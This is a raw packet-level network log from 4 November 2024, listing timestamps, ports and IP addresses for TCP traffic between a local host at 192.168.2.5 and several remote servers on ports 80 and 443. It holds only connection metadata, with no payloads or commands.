Nov 4, 2024 17:32:06.375291109 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.375302076 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.375324965 CET	49941	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.375332117 CET	443	49941	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.377665997 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.377710104 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.377778053 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.377907991 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.377923012 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.419445038 CET	80	49940	185.215.113.43	192.168.2.5
Nov 4, 2024 17:32:06.419528961 CET	49940	80	192.168.2.5	185.215.113.43
Nov 4, 2024 17:32:06.422846079 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:06.428278923 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:06.428355932 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:06.428457022 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:06.433815002 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:06.661751032 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.661822081 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.661875010 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.662117958 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.662117958 CET	49937	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.662139893 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.662153006 CET	443	49937	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.664594889 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.664642096 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.664706945 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.664828062 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.664840937 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.852777004 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:06.852828979 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:06.852904081 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:06.853389025 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:06.853399992 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:06.978238106 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.978718996 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.978750944 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:06.979237080 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:06.979253054 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.036899090 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.037487030 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.037506104 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.037857056 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.037863970 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.092310905 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.092828989 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.092842102 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.093286037 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.093290091 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.109047890 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.109560013 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.109590054 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.109735012 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.109792948 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.109853983 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.109981060 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.109987020 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.110011101 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.110028982 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.110044003 CET	49942	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.110049963 CET	443	49942	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.112524033 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.112567902 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.112642050 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.112754107 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.112766027 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.169076920 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.169192076 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.169241905 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.169255018 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.169297934 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.169467926 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.169467926 CET	49943	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.169487953 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.169497967 CET	443	49943	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.172216892 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.172265053 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.172365904 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.172590017 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.172596931 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.226465940 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.226547003 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.226593971 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.227018118 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.227035999 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.227041006 CET	49944	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.227049112 CET	443	49944	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.230901003 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.230954885 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.231069088 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.231362104 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.231381893 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.247550964 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.247746944 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.247787952 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.247803926 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.247860909 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.248023033 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.248045921 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.248063087 CET	49945	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.248069048 CET	443	49945	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.251897097 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.251936913 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.252000093 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.252181053 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.252192020 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.341176987 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341191053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341202974 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341243029 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341281891 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341353893 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341370106 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341394901 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341411114 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341419935 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341463089 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341480970 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341495991 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341515064 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341521978 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341526031 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.341542006 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341568947 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.341583014 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.346261978 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.346277952 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.346309900 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.346328974 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.346374035 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.346401930 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.346410036 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.346437931 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.395376921 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.395844936 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.395865917 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.396509886 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.396517038 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.495608091 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.495676994 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.495686054 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.495718956 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.495743990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.495789051 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.495836973 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.495850086 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.495863914 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.495879889 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.495904922 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.496371031 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.496393919 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.496403933 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.496421099 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.496452093 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.496499062 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.496510029 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.496520996 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.496542931 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.496565104 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.503761053 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.503782988 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.503794909 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.503827095 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.503873110 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.525614977 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.525696039 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.525767088 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.525885105 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.525903940 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.525914907 CET	49947	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.525921106 CET	443	49947	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.528469086 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.528520107 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.528585911 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.528719902 CET	49953	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.528736115 CET	443	49953	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.614792109 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.614870071 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.614917040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.614964962 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.615000963 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615001917 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.615025043 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615036011 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615065098 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.615093946 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.615437031 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615478039 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615492105 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615520000 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.615539074 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.615573883 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615586042 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.615627050 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.622839928 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.622862101 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.622875929 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.622944117 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.650732040 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.650829077 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.650924921 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.733903885 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.733963013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734051943 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734086990 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734097958 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734205008 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.734205008 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.734205008 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.734371901 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734435081 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734447956 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734461069 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.734493971 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.734534025 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.734950066 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.735018015 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.735079050 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.738142014 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.742260933 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.742273092 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.742285013 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.742356062 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.805773020 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.805845976 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.805876017 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.805896997 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.824770927 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.824795008 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.824994087 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.853100061 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853148937 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853274107 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853290081 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853305101 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853352070 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.853353024 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.853570938 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853586912 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853612900 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.853636980 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.853727102 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853805065 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.853818893 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853933096 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.853996992 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.854010105 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.854012012 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.854042053 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.854054928 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.861996889 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.862041950 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.862057924 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.862075090 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.862132072 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.862204075 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.863022089 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.863450050 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.863466024 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.863917112 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.863923073 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.905752897 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.906833887 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.906843901 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.910912991 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:07.910926104 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:07.919929028 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:07.920011044 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:07.924792051 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.925054073 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.925143957 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.929404020 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:07.929414034 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:07.929677010 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:07.938231945 CET	49948	443	192.168.2.5	4.245.163.56
Nov 4, 2024 17:32:07.943259954 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.943284035 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:07.943346977 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:07.979331970 CET	443	49948	4.245.163.56	192.168.2.5
Nov 4, 2024 17:32:08.012928963 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.012947083 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.012960911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.012975931 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.012989998 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013076067 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013092995 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013107061 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013120890 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.013120890 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013120890 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.013137102 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013139963 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.013139963 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.013153076 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013171911 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013181925 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.013202906 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.013245106 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.013482094 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.013586998 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.013647079 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.013653040 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.014112949 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.015605927 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.017079115 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.028863907 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.028863907 CET	49949	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.028886080 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.028892040 CET	443	49949	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.034369946 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.034395933 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.034883976 CET	49952	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.034890890 CET	443	49952	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.035176039 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.035196066 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.035600901 CET	49951	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.035607100 CET	443	49951	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.036338091 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.036883116 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.038130045 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.043951988 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.044668913 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.044837952 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.065104961 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.065221071 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.065413952 CET	49946	80	192.168.2.5	31.41.244.11
Nov 4, 2024 17:32:08.069313049 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.069358110 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.069365978 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.069376945 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.069389105 CET	49950	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.069396019 CET	443	49950	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.069447041 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.083462954 CET	49954	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:08.083494902 CET	443	49954	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:08.092633963 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.092686892 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.092706919 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.092722893 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.092735052 CET	80	49946	31.41.244.11	192.168.2.5
Nov 4, 2024 17:32:08.092747927 CET	80	49946	31.41.244.11	192.168.2.5
